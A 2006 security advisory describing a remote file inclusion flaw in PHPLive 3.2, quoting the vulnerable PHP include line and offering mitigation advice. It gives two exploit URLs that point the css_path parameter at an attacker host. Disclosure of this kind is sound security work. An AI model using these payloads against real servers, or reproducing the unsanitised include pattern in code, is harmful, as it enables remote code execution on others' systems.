45 lines
No EOL
1.1 KiB
Text
45 lines
No EOL
1.1 KiB
Text
Advisory: PHPLive 3.2 Remote Injection Vulnerability
|
|
Release Date: 2006/07/23
|
|
Author: magnific
|
|
Discovered: aneurysm.inc security reserach
|
|
Risk: High
|
|
Vendor Status: not contacted | no patch available
|
|
Vendor Site: www.osicodes.com
|
|
Contact: aneurysm_inc[at]hotmail[dot]com
|
|
Version: all
|
|
|
|
-----------
|
|
Overview:
|
|
|
|
Some variables are not properly sanitized before being used.
|
|
Here you will find the variables not properly sanitized:
|
|
|
|
-----------
|
|
Vulnerable code:
|
|
|
|
help.php /setup/header.php etc..
|
|
|
|
<? $css_path = ( !isset( $css_path ) ) ? $css_path = "./" : $css_path ; include_once( $css_path."css/default.php" ) ; ?>
|
|
|
|
-----------
|
|
Execution:
|
|
|
|
help.php?css_path=htt://attacker
|
|
setup/header.php?css_path=htt://attacker
|
|
|
|
|
|
-----------
|
|
Vendor:
|
|
|
|
At the moment, there are no solutions from the vendor. If you want to make
|
|
sure the code and your PHPLIVE you have to sanitize the variable $css_path,
|
|
in all files affecteds.
|
|
Active SAFE_MODE on server, for local security.
|
|
|
|
---------------------------
|
|
aneurysm.inc security reserach
|
|
irc.gigachat.net
|
|
#aneurysm.inc
|
|
---------------------------
|
|
|
|
# milw0rm.com [2006-07-23] |